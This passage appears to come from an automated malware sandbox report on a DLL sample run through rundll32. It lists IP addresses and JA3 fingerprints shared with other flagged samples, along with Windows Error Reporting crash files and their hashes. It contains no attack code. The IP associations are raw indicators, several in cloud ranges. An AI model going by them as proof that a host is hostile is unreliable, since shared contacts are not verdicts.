                                                                                                                        • 13.82.28.61
                                                                                                                        6yDD19jMIu.dllGet hashmaliciousBrowse
                                                                                                                        • 13.82.28.61
                                                                                                                        B6VQd36tt6.dllGet hashmaliciousBrowse
                                                                                                                        • 13.82.28.61
                                                                                                                        B6VQd36tt6.dllGet hashmaliciousBrowse
                                                                                                                        • 52.97.183.162
                                                                                                                        P2AN3Yrtnz.exeGet hashmaliciousBrowse
                                                                                                                        • 40.93.212.0
                                                                                                                        b3astmode.x86Get hashmaliciousBrowse
                                                                                                                        • 72.154.237.78
                                                                                                                        b3astmode.arm7Get hashmaliciousBrowse
                                                                                                                        • 20.153.181.154
                                                                                                                        b3astmode.arm7-20211011-1850Get hashmaliciousBrowse
                                                                                                                        • 20.63.129.213
                                                                                                                        TNIZtb3HS3.exeGet hashmaliciousBrowse
                                                                                                                        • 20.42.65.92
                                                                                                                        PROFORMA INVOICE -PI6120..htmlGet hashmaliciousBrowse
                                                                                                                        • 40.101.62.34
                                                                                                                        setup_x86_x64_install.exeGet hashmaliciousBrowse
                                                                                                                        • 52.168.117.173
                                                                                                                        ntpclientGet hashmaliciousBrowse
                                                                                                                        • 21.215.78.72
                                                                                                                        2021catalog-selected products.xlsmGet hashmaliciousBrowse
                                                                                                                        • 13.92.100.208
                                                                                                                        K6E9636KoqGet hashmaliciousBrowse
                                                                                                                        • 159.27.209.248
                                                                                                                        setup_x86_x64_install.exeGet hashmaliciousBrowse
                                                                                                                        • 20.42.73.29
                                                                                                                        Hm7d40tE44.exeGet hashmaliciousBrowse
                                                                                                                        • 104.47.53.36
                                                                                                                        mixsix_20211008-150045.exeGet hashmaliciousBrowse
                                                                                                                        • 20.189.173.22
                                                                                                                        SecuriteInfo.com.W32.AIDetect.malware2.21009.exeGet hashmaliciousBrowse
                                                                                                                        • 104.47.53.36

                                                                                                                        JA3 Fingerprints

                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                        ce5f3254611a8c095a3d821d44539877m87xfb63XU.dllGet hashmaliciousBrowse
                                                                                                                        • 52.97.218.82
                                                                                                                        • 40.101.124.226
                                                                                                                        • 40.97.153.146
                                                                                                                        • 52.98.207.194
                                                                                                                        • 52.97.218.66
                                                                                                                        • 13.82.28.61
                                                                                                                        • 52.97.137.210
                                                                                                                        • 40.97.116.82
                                                                                                                        • 52.97.183.162
                                                                                                                        m87xfb63XU.dllGet hashmaliciousBrowse
                                                                                                                        • 52.97.218.82
                                                                                                                        • 40.101.124.226
                                                                                                                        • 40.97.153.146
                                                                                                                        • 52.98.207.194
                                                                                                                        • 52.97.218.66
                                                                                                                        • 13.82.28.61
                                                                                                                        • 52.97.137.210
                                                                                                                        • 40.97.116.82
                                                                                                                        • 52.97.183.162
                                                                                                                        6yDD19jMIu.dllGet hashmaliciousBrowse
                                                                                                                        • 52.97.218.82
                                                                                                                        • 40.101.124.226
                                                                                                                        • 40.97.153.146
                                                                                                                        • 52.98.207.194
                                                                                                                        • 52.97.218.66
                                                                                                                        • 13.82.28.61
                                                                                                                        • 52.97.137.210
                                                                                                                        • 40.97.116.82
                                                                                                                        • 52.97.183.162
                                                                                                                        6yDD19jMIu.dllGet hashmaliciousBrowse
                                                                                                                        • 52.97.218.82
                                                                                                                        • 40.101.124.226
                                                                                                                        • 40.97.153.146
                                                                                                                        • 52.98.207.194
                                                                                                                        • 52.97.218.66
                                                                                                                        • 13.82.28.61
                                                                                                                        • 52.97.137.210
                                                                                                                        • 40.97.116.82
                                                                                                                        • 52.97.183.162
                                                                                                                        B6VQd36tt6.dllGet hashmaliciousBrowse
                                                                                                                        • 52.97.218.82
                                                                                                                        • 40.101.124.226
                                                                                                                        • 40.97.153.146
                                                                                                                        • 52.98.207.194
                                                                                                                        • 52.97.218.66
                                                                                                                        • 13.82.28.61
                                                                                                                        • 52.97.137.210
                                                                                                                        • 40.97.116.82
                                                                                                                        • 52.97.183.162
                                                                                                                        B6VQd36tt6.dllGet hashmaliciousBrowse
                                                                                                                        • 52.97.218.82
                                                                                                                        • 40.101.124.226
                                                                                                                        • 40.97.153.146
                                                                                                                        • 52.98.207.194
                                                                                                                        • 52.97.218.66
                                                                                                                        • 13.82.28.61
                                                                                                                        • 52.97.137.210
                                                                                                                        • 40.97.116.82
                                                                                                                        • 52.97.183.162
                                                                                                                        setup_x86_x64_install.exeGet hashmaliciousBrowse
                                                                                                                        • 52.97.218.82
                                                                                                                        • 40.101.124.226
                                                                                                                        • 40.97.153.146
                                                                                                                        • 52.98.207.194
                                                                                                                        • 52.97.218.66
                                                                                                                        • 13.82.28.61
                                                                                                                        • 52.97.137.210
                                                                                                                        • 40.97.116.82
                                                                                                                        • 52.97.183.162
                                                                                                                        aVFOmbW2t7.dllGet hashmaliciousBrowse
                                                                                                                        • 52.97.218.82
                                                                                                                        • 40.101.124.226
                                                                                                                        • 40.97.153.146
                                                                                                                        • 52.98.207.194
                                                                                                                        • 52.97.218.66
                                                                                                                        • 13.82.28.61
                                                                                                                        • 52.97.137.210
                                                                                                                        • 40.97.116.82
                                                                                                                        • 52.97.183.162
                                                                                                                        gxJ83rJkgw.msiGet hashmaliciousBrowse
                                                                                                                        • 52.97.218.82
                                                                                                                        • 40.101.124.226
                                                                                                                        • 40.97.153.146
                                                                                                                        • 52.98.207.194
                                                                                                                        • 52.97.218.66
                                                                                                                        • 13.82.28.61
                                                                                                                        • 52.97.137.210
                                                                                                                        • 40.97.116.82
                                                                                                                        • 52.97.183.162
                                                                                                                        yR4AxlwcWJ.exeGet hashmaliciousBrowse
                                                                                                                        • 52.97.218.82
                                                                                                                        • 40.101.124.226
                                                                                                                        • 40.97.153.146
                                                                                                                        • 52.98.207.194
                                                                                                                        • 52.97.218.66
                                                                                                                        • 13.82.28.61
                                                                                                                        • 52.97.137.210
                                                                                                                        • 40.97.116.82
                                                                                                                        • 52.97.183.162
                                                                                                                        BsyK7FB5DQ.exeGet hashmaliciousBrowse
                                                                                                                        • 52.97.218.82
                                                                                                                        • 40.101.124.226
                                                                                                                        • 40.97.153.146
                                                                                                                        • 52.98.207.194
                                                                                                                        • 52.97.218.66
                                                                                                                        • 13.82.28.61
                                                                                                                        • 52.97.137.210
                                                                                                                        • 40.97.116.82
                                                                                                                        • 52.97.183.162
                                                                                                                        SGfGZT66wD.exeGet hashmaliciousBrowse
                                                                                                                        • 52.97.218.82
                                                                                                                        • 40.101.124.226
                                                                                                                        • 40.97.153.146
                                                                                                                        • 52.98.207.194
                                                                                                                        • 52.97.218.66
                                                                                                                        • 13.82.28.61
                                                                                                                        • 52.97.137.210
                                                                                                                        • 40.97.116.82
                                                                                                                        • 52.97.183.162
                                                                                                                        uT9rwkGATJ.dllGet hashmaliciousBrowse
                                                                                                                        • 52.97.218.82
                                                                                                                        • 40.101.124.226
                                                                                                                        • 40.97.153.146
                                                                                                                        • 52.98.207.194
                                                                                                                        • 52.97.218.66
                                                                                                                        • 13.82.28.61
                                                                                                                        • 52.97.137.210
                                                                                                                        • 40.97.116.82
                                                                                                                        • 52.97.183.162
                                                                                                                        XK1PLPuwjL.exeGet hashmaliciousBrowse
                                                                                                                        • 52.97.218.82
                                                                                                                        • 40.101.124.226
                                                                                                                        • 40.97.153.146
                                                                                                                        • 52.98.207.194
                                                                                                                        • 52.97.218.66
                                                                                                                        • 13.82.28.61
                                                                                                                        • 52.97.137.210
                                                                                                                        • 40.97.116.82
                                                                                                                        • 52.97.183.162
                                                                                                                        pHEiqE9toa.msiGet hashmaliciousBrowse
                                                                                                                        • 52.97.218.82
                                                                                                                        • 40.101.124.226
                                                                                                                        • 40.97.153.146
                                                                                                                        • 52.98.207.194
                                                                                                                        • 52.97.218.66
                                                                                                                        • 13.82.28.61
                                                                                                                        • 52.97.137.210
                                                                                                                        • 40.97.116.82
                                                                                                                        • 52.97.183.162
                                                                                                                        SecuriteInfo.com.W32.AIDetect.malware2.24481.exeGet hashmaliciousBrowse
                                                                                                                        • 52.97.218.82
                                                                                                                        • 40.101.124.226
                                                                                                                        • 40.97.153.146
                                                                                                                        • 52.98.207.194
                                                                                                                        • 52.97.218.66
                                                                                                                        • 13.82.28.61
                                                                                                                        • 52.97.137.210
                                                                                                                        • 40.97.116.82
                                                                                                                        • 52.97.183.162
                                                                                                                        vH0SHswvrb.exeGet hashmaliciousBrowse
                                                                                                                        • 52.97.218.82
                                                                                                                        • 40.101.124.226
                                                                                                                        • 40.97.153.146
                                                                                                                        • 52.98.207.194
                                                                                                                        • 52.97.218.66
                                                                                                                        • 13.82.28.61
                                                                                                                        • 52.97.137.210
                                                                                                                        • 40.97.116.82
                                                                                                                        • 52.97.183.162
                                                                                                                        NM0NyvZi8O.exeGet hashmaliciousBrowse
                                                                                                                        • 52.97.218.82
                                                                                                                        • 40.101.124.226
                                                                                                                        • 40.97.153.146
                                                                                                                        • 52.98.207.194
                                                                                                                        • 52.97.218.66
                                                                                                                        • 13.82.28.61
                                                                                                                        • 52.97.137.210
                                                                                                                        • 40.97.116.82
                                                                                                                        • 52.97.183.162
                                                                                                                        yOTzv1Qz0n.exeGet hashmaliciousBrowse
                                                                                                                        • 52.97.218.82
                                                                                                                        • 40.101.124.226
                                                                                                                        • 40.97.153.146
                                                                                                                        • 52.98.207.194
                                                                                                                        • 52.97.218.66
                                                                                                                        • 13.82.28.61
                                                                                                                        • 52.97.137.210
                                                                                                                        • 40.97.116.82
                                                                                                                        • 52.97.183.162
                                                                                                                        SWaTAV7EdD.exeGet hashmaliciousBrowse
                                                                                                                        • 52.97.218.82
                                                                                                                        • 40.101.124.226
                                                                                                                        • 40.97.153.146
                                                                                                                        • 52.98.207.194
                                                                                                                        • 52.97.218.66
                                                                                                                        • 13.82.28.61
                                                                                                                        • 52.97.137.210
                                                                                                                        • 40.97.116.82
                                                                                                                        • 52.97.183.162

                                                                                                                        Dropped Files

                                                                                                                        No context

                                                                                                                        Created / dropped Files

                                                                                                                        C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_d4e7795f79114aeb9c4dc9cc69e25e6282339_82810a17_1874b820\Report.wer
                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                        File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):12044
                                                                                                                        Entropy (8bit):3.765368455363511
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:192:0YuiJ0oXAHBUZMX4jed+x/u7sAwS274It7cJ:MinXoBUZMX4je8/u7sAwX4It7cJ
                                                                                                                        MD5:316CE6E876A182906C00DD2AD8F35040
                                                                                                                        SHA1:54AD11020F6730D0C756C5682E1BAEA55AE1F317
                                                                                                                        SHA-256:74EA72682FCB32B1165308196313E62BADE799EF2947E6D132D5A0D077219B19
                                                                                                                        SHA-512:749DD024BDC05C4918700FCF5740173D68F7FCEF20A4C56BCFF2D894123A628A78AF6B8103512056FBBEF378828B4AAEA3F757FA297DF91C155835C7FD19E77C
                                                                                                                        Malicious:false
                                                                                                                        Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.2.7.8.4.6.5.4.6.8.2.6.1.5.0.0.8.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.7.8.4.6.5.4.7.5.6.0.5.2.3.9.5.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.0.2.d.3.f.3.5.-.4.3.8.7.-.4.f.e.d.-.b.7.a.f.-.7.6.8.4.9.9.3.f.7.a.9.9.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.d.0.4.5.a.6.7.-.2.2.2.e.-.4.c.7.2.-.b.b.e.c.-.0.8.9.b.4.0.8.1.c.f.f.9.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.b.a.0.-.0.0.0.1.-.0.0.1.b.-.d.a.8.9.-.2.e.6.0.f.0.b.e.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.b.c.c.5.d.c.3.2.2.2.0.3.4.d.3.f.2.5.7.f.1.f.d.3.5.8.8.9.e.5.b.e.9.0.f.0.9.b.5.f.!.r.
                                                                                                                        C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_d4e7795f79114aeb9c4dc9cc69e25e6282339_82810a17_19a08827\Report.wer
                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                        File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):12246
                                                                                                                        Entropy (8bit):3.765114618947458
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:192:ogaPiW0oX7HBUZMX4jed+j/u7sSS274It7cl:oJPiQXbBUZMX4jeO/u7sSX4It7cl
                                                                                                                        MD5:9CF8099E09C39847EFFF6FB7B70CEA33
                                                                                                                        SHA1:16B081768605B3C60E9DBF23A1646EBDF70337E0
                                                                                                                        SHA-256:D780C3F704283D57B71AE6362A0F6095E72DEDC4D08062E15094DF7FA1DAD471
                                                                                                                        SHA-512:F9873C535120F8E9BEF91F26B93B9251BD6F06F506E7D53E5EDDAE3E23AE04674686E39BD8BB186632AFF0A43717117E4F61818502AE49E938D546F5FA34EE37
                                                                                                                        Malicious:false
                                                                                                                        Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.2.7.8.4.6.5.4.7.9.9.9.8.3.1.7.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.7.8.4.6.5.4.9.3.9.0.4.4.8.4.1.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.d.1.d.e.5.4.7.-.b.d.c.0.-.4.a.7.4.-.9.0.f.e.-.4.f.e.1.f.8.d.b.f.f.b.b.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.b.e.9.a.1.f.8.-.8.2.c.a.-.4.a.c.0.-.9.c.1.f.-.0.4.d.d.4.9.8.8.b.9.8.d.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.9.4.0.-.0.0.0.1.-.0.0.1.b.-.f.8.7.1.-.3.6.6.7.f.0.b.e.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.b.c.c.5.d.c.3.2.2.2.0.3.4.d.3.f.2.5.7.f.1.f.d.3.5.8.8.9.e.5.b.e.9.0.f.0.9.b.5.f.!.r.
                                                                                                                        C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_d4e7795f79114aeb9c4dc9cc69e25e6282339_82810a17_1be8e7ac\Report.wer
                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                        File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):12040
                                                                                                                        Entropy (8bit):3.7654289890935924
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:192:43iu0oX/HBUZMX4jed+x/u7sAwS274It7c/V:IiYX/BUZMX4je8/u7sAwX4It7c/V
                                                                                                                        MD5:47234B5A061C3D57518C75D012598E15
                                                                                                                        SHA1:8054E955AA6274E52832CECAC7BF98AB2AAC4A3E
                                                                                                                        SHA-256:BF44ADFD50F9CC39C25CC5B4642FD4EE5C007226F9AEDC5BBCA7FBA5DDBF6E4F
                                                                                                                        SHA-512:273E8DA585B81F6C6468E2BFFE4E452420D55F06597B6BE6F59747DB2FB96326B7C015A610D4D5A5B1F663593E3398E04C118600B7A5838156B1A568928CE7C6
                                                                                                                        Malicious:false
                                                                                                                        Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.2.7.8.4.6.5.4.7.5.0.8.9.8.8.9.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.7.8.4.6.5.4.8.8.7.3.0.5.2.7.4.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.4.9.5.e.6.6.3.-.8.9.1.b.-.4.5.3.4.-.a.c.6.0.-.b.9.b.2.2.c.2.8.0.c.a.8.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.e.a.7.1.d.2.7.-.d.c.2.f.-.4.e.0.1.-.a.e.c.e.-.3.b.4.9.0.b.5.1.3.6.2.2.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.5.5.4.-.0.0.0.1.-.0.0.1.b.-.2.7.a.b.-.4.b.6.2.f.0.b.e.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.b.c.c.5.d.c.3.2.2.2.0.3.4.d.3.f.2.5.7.f.1.f.d.3.5.8.8.9.e.5.b.e.9.0.f.0.9.b.5.f.!.r.
                                                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WER1EDD.tmp.dmp
                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                        File Type:Mini DuMP crash report, 15 streams, Mon Oct 11 22:37:50 2021, 0x1205a4 type
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):35838
                                                                                                                        Entropy (8bit):2.3956337648230916
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:192:zRpsH1iJ4InP5sfRuvUM+sOI36GDZ69CA4nxZN5knmhpIRY:dCkiInERYN+i6G0s1nF5kmc2
                                                                                                                        MD5:6314F249ADC86966FA67E57AE5C44922
                                                                                                                        SHA1:FFCAA1E89BAD579997BE419D71AA5F670200CD69
                                                                                                                        SHA-256:39A76F75342336856B50BBC0B977FBE57722A50B0BD0008499FBBC2A0B263C10
                                                                                                                        SHA-512:95B2148C5D3E31169DD1EBF64FACE7B4728DB4473EA9EC225A992B4BFD640E8E9C29393C9BDE50C99E9EAA94FB45EAA11BECFCC3CF2DE1063EDA9ACA9EA02DBB
                                                                                                                        Malicious:false
                                                                                                                        Preview: MDMP....... .........da...................U...........B..............GenuineIntelW...........T...........T.da"............................0..1...............W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .D.a.y.l.i.g.h.t. .T.i.m.e.......................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.............................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.7.1.3.4...1.........................................................................................................
                                                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WER270C.tmp.WERInternalMetadata.xml
                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                        File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):8404
                                                                                                                        Entropy (8bit):3.698373923142492
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:192:Rrl7r3GLNi/j/6ZCy6YoDz6Tofg4dgmf8zSNz+prz89bDdsf0Bm:RrlsNiL/6oy6YCz6Tofg4dgmf8zSNjDk
                                                                                                                        MD5:D9504C279DAD3BB36B90B2ABB8BD6024
                                                                                                                        SHA1:8F897066FFB317B3CB6FE7CEDDCD657ABEFA0AD2
                                                                                                                        SHA-256:10A8657425ED12843DE5D88E4AC5FB228E04E30FC2285B5ABFAB0644D4F5FDED
                                                                                                                        SHA-512:1E599A129E128BDA89BBD6B4D4EBB20D56F4B4C3576399CFAF5B5EA8B4227ECE0156F047B9B628EA4091B4D3D829501B68118A87EA09EC46B4ECCE0E714F16F8
                                                                                                                        Malicious:false
                                                                                                                        Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.0.7.2.<./.P.i.d.>.......
                                                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WER29CC.tmp.xml
                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):4771
                                                                                                                        Entropy (8bit):4.4859311182693515
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:48:cvIwSD8zsdNJgtWI9jZVWSC8B2+8fm8M4JCdsTMF3+q8vjsTJO4SrSWd:uITf9EqSN07JNmKiJODWWd
                                                                                                                        MD5:14148F5D29C531D9A2DAB8BE378319B4
                                                                                                                        SHA1:2555ADA459F857D0F04C818ED0FA3523FBAEDA54
                                                                                                                        SHA-256:345133599386F0C3CD20ADF62510BA963E25DC1EE938691229F2E011F02CCF15
                                                                                                                        SHA-512:FDC853B50B28C8C90540AB31EBB67DE00BA0BEBE28A69CE469CCECE120487E62648DBF600DFC5F3F58211436306E7276FB12B579879897A84E1DD82E612446B0
                                                                                                                        Malicious:false
                                                                                                                        Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1205748" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WER398A.tmp.dmp
                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                        File Type:Mini DuMP crash report, 15 streams, Mon Oct 11 22:37:57 2021, 0x1205a4 type
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):34760
                                                                                                                        Entropy (8bit):2.413605188260289
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:192:NICEknpSR00ugBtrvUM+sOI36FDZuzLNR2GK0KHnIZ1S1:PEPTN+i6FknX2GQIZ1C
                                                                                                                        MD5:FE3A9A57895A11BBDE379864BD34A1AA
                                                                                                                        SHA1:4660CCA0FFEDA2D9F0CC371B0E756BEBEE1E59CA
                                                                                                                        SHA-256:D3DAFB26C47511DD9A99713F077D9D3503749D9A128772ED3BCE2381FAD98C2B
                                                                                                                        SHA-512:5BF3A8825B1CBFB3F54916D2BE008CEC447763A16AB6A130FD3A78496E6D3DB5C9239FCEF211919354E6B78A3070072128C6A646F42403F0935A44ADB14B951E
                                                                                                                        Malicious:false
                                                                                                                        Preview: MDMP....... ........da...................U...........B..............GenuineIntelW...........T.......T...X.da!............................0..1...............W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .D.a.y.l.i.g.h.t. .T.i.m.e.......................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.............................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.7.1.3.4...1.........................................................................................................
                                                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WER4543.tmp.WERInternalMetadata.xml
                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                        File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):8412
                                                                                                                        Entropy (8bit):3.6972167795220234
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:192:Rrl7r3GLNiV36p6Yo76njOxp2+Pgmf8zSNz+pry89bLFsflZm:RrlsNiF6p6YU6axp2+Pgmf8zSNcLefy
                                                                                                                        MD5:76872B4F10DAB5548F7C5A90D51D5856
                                                                                                                        SHA1:09F65EB354956B8BDF85D560CB00855480EDA67B
                                                                                                                        SHA-256:7590A90E442F73573110BB00A58EC1D1B8B6E6A7F8C43CA37ECB25682A052922
                                                                                                                        SHA-512:8E63F1986DE67951325919E86C1A72F463AAD58723FE2E3710743EC271304908CF6D0C12B2CF3E2C6AF141782DC7BF36C68EC556A88DC3E01F000761D828CFCC
                                                                                                                        Malicious:false
